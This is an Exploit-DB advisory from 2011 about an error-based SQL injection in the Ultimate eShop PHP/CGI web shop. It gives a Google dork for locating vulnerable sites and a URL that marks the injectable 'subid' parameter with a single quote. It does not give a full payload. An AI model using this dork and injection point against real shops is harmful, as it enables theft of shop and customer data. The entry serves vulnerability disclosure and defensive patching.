Ultimate eShop - Error-Based SQL Injection

EDB-ID:

17191

CVE:

N/A


Author:

Romka

Type:

webapps


Platform:

PHP

Date:

2011-04-20


# Exploit Title: Ultimate eShop Error Based SQL Injection Vulnerability
# Google Dork: inurl:index.cgi?aktion=shopview
# Date: 19/04/2011
# Author: Romka
# Software Link: http://www.ultimate-eshop.de/
# Tested on: Windows XP SP3

# Exploit:

http://localhost/index.cgi?aktion=shopview&go=artikel&topid=1&subid=1'ERROR BASED INJECTION

# Greetings:

CliC, pyro, r0bnet, Haukez, Dexter and Cyberpunkz